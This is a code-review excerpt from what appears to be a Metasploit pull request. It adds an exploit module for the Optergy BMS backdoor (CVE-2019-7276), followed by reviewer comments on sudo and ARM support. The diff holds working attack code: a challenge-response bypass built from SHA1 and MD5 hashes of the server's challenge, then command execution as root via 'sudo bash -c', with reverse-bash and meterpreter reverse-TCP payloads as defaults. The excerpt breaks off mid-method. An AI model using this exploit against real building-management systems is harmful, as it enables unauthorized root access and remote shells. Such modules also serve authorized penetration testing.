modules/exploits/linux/http/optergy_bms_backdoor_rce_cve_2019_7276.rb

```diff
@@ -0,0 +1,154 @@
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF Module contributor
+          'Gjoko Krstic <gjoko[at]applied-risk.com>' # Discovery
+        ],
+        'References' => [
+          [ 'CVE', '2019-7276'],
+          [ 'URL', 'https://applied-risk.com/resources/ar-2019-008' ],
+          [ 'URL', 'https://optergy.com/products/proton/' ],
+          [ 'URL', 'https://optergy.com/products/optergy-enterprise/' ],
+          [ 'URL', 'https://attackerkb.com/topics/QrYFIjnd3J/cve-2019-7276' ],
+          [ 'EDB', '47641'],
+          [ 'PACKETSTORM', '155258']
+        ],
+        'DisclosureDate' => '2019-11-05',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'Payload' => { 'BadChars' => "\x20" },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Step 1: get the challenge and compute the response answer for the backdoor execution
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/tools/ajax/ConsoleResult.html?get')
+    })
+    if res.nil? || (res.code != 200)
+      return nil
+    else
+      # Get and create a challenge response
+      res_json = res.get_json_document
+      return nil if res_json.nil? || res_json.blank?
+
+      # Get the challenge
+      challenge = res_json['response']['message']
+      # Make SHA1 hash from received challenge
+      h1 = Digest::SHA1.hexdigest challenge
+      # Make MD5 hash from SHA1 hash
+      h2 = Digest::MD5.hexdigest h1
+      # Combine MD5 hash and SHA1 hash as answer (response) to the challenge
+      answer = h1 + h2
+    end
+
+    # Step 2: execute payload (RCE) using the backdoor and challenge response obtained from step 1.
+    if target['Type'] == :linux_dropper
+      cmd = cmd.gsub(' ') { '${IFS}' }
+    end
+    payload = "sudo bash -c #{cmd}"
```

Comment:
Is there any scenario in which this would be viable without the `sudo`?  Consider some Redhat installs will not have `sudo` installed.

Reply:
Yeah, good point. 
However, reading thru the documentation though the user `optergy` is `sudo` enabled and `sudo` is installed in all Optergy BMS standard installs,.
Bear in mind that this is a `IoT` type of deployment that typically comes with embedded firmware and hardware. 
I do not think that there will be a scenario where `sudo` is not installed.
Anyhow, what we could do is to provide the user an option to either run the module with  a `sudo` option enabled or run it under the `optergy` user credentials.

Reply:
Thanks for the added details, you mentions this is an IoT type env is all hardware `x86` or would it be reasonable to expect to add support for `arm` architectures in the file dropper pattern?

Reply:
See https://github.com/rapid7/metasploit-framework/pull/17806/commits/bcef7ee357a376154310d8af7a19299829bc1b4d for `SUDO` option

ARM is not supported, only Intel
```
HARDWARE SPECIFICATIONS 
Model Optergy Proton (P10 / P20 / P50 / P100)
Processor Integrated Intel J1900 2.00GHz Quad Core processor
Ethernet 1 (Active) x RTL8111F GbE port
Storage 120GB mSATA SSD RAM 4GB

OS Debian LINUX OS ver Debian 7
```